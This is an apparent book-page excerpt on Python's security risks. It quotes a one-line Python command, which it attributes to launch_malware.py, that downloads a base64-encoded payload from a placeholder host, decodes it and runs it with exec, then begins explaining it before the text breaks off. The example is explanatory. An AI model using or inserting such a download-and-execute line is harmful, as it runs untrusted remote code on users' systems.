May 2018
Intermediate to advanced
380 pages
9h 37m
English
Python is popular for security purposes, both positive and negative, as it is commonly found on servers, as well as developer machines. It allows for the ability to execute code without having to use pre-compiled binaries, and it has zero internal auditing. For example, launch_malware.py (provided within the PEP) shows how easy it is to download, decrypt, and execute malicious software using a single Python command:
python -c "import urllib.request, base64;
exec(base64.b64decode(
urllib.request.urlopen('http://my-exploit/py.b64')
).decode())"This code tells the Python interpeter to execute the command that is provided. That command imports two libraries (urllib.request and base64), then tells the system to execute a ...